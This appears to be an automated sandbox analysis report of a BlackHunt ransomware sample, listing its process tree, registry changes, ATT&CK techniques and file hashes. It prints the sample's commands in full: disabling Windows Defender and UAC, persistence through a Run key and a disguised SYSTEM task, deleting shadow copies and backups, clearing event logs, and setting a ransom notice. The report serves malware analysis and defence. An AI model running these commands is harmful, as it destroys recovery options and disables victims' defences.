7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 56 PID 2208 wrote to memory of 2704 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 56 PID 2604 wrote to memory of 2628 2604 conhost.exe 54 PID 2604 wrote to memory of 2628 2604 conhost.exe 54 PID 2604 wrote to memory of 2628 2604 conhost.exe 54 PID 2208 wrote to memory of 2024 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 135 PID 2208 wrote to memory of 2024 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 135 PID 2208 wrote to memory of 2024 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 135 PID 2208 wrote to memory of 2024 2208 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe 135 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe"C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe"1⤵
- UAC bypass
- Checks whether UAC is enabled
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2208 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:2568
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2804 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2560
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵PID:2604
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2628
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵PID:2652
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:1784
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2680
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:1772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:2656
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:1732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2636
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2304
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1656
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2756
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:1472
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2704
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:2024
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:1916
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:2472
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:1048
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:2532
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2896
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:284
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2900
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:1452
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3064
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2296
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:1588
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:2024
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1872
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:952
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:2468
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1688
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:3020
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2120
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:2728
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:820
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2732
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:2016
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:944
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1136
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:2700
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe" /F2⤵PID:2520
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe" /F3⤵
- Creates scheduled task(s)
PID:2720
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:2124
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2400
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:2148
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1100
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:604
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:472
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:1184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2444
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1836
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:1652
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2948
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1444
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:1276
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:3056
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1672
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:852
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:564
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1040
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:3140
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2156
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:3292
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:2752
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:4708
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:1604
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:1816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:5860
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3864
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:3288
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1512
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:5636
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:5672
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:5420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:5492
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2632
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1580
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:3856
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:5916
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2760
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:956
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:3036
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:4712
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:2792
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:1208
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1480
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1636
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2652
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:4088
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:1248
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:3228
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:4080
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:576
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:812
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:5456
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:4172
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:3940
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:3684
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\7ad88bd90a01f58887b3606144cc005425b29b2876da4fe5a92f90c1ddc9a9ec.exe"2⤵
- Deletes itself
PID:5620 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4108
-
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "459591140-2007753119-2012737616-170257679140130103420991735751285357023669571680"1⤵
- Suspicious use of WriteProcessMemory
PID:2604
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3428
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:1136
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:3356
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5def49c39835f97cfe80ce835a83ad510
SHA1aa02076ac2da7df7da08c54e4169c23111c44546
SHA256908e0d72126d4bd4eace7c625416fbb47d1eb516d7fe9d6b783b3e3318aa159c
SHA5129175e14bb6c3f280e37edd52cc1ce97d8eb9f569ffb74fd4426bb1abe3146dfdc31c7188fa87c40a64cc82207c8aa6eeadebb46f825de937d18e640822e6b15c
-
Filesize
12KB
MD51ce1ff58d1e3d1b92749817ba3b42a1d
SHA18cdea0f654ca9e1ca3de1a192ccbc7748bf084cc
SHA256b764c2c75ce56ffffd30cff44d1a0f23c41d1082a5ae3a210a53cebb78a5aa7f
SHA51230870719fd932728e29387362f1b1a0d981d6c1712b67dffdeffea185602a66cf67780042b57268871106c2f2f8224607b7e707bdcfedffda4075cb62e57ea36
-
Filesize
684B
MD5265128efcc8a1d2a1a980c3fb3334f2c
SHA18ecc8e61d7cd41d9893b965b42666d80be024290
SHA256615b56ba48aa3b70a90a89d6bd539e6d663584192deb5d4264f9d0285d6979d0
SHA5128a4190c629d44c570341e009f69a0aed937570882046aeff30ca1b5d50c11619336f4f8cead80397107b2b8c0ab7d363f92c86cf1e1d41d1eed9e2e9312537c9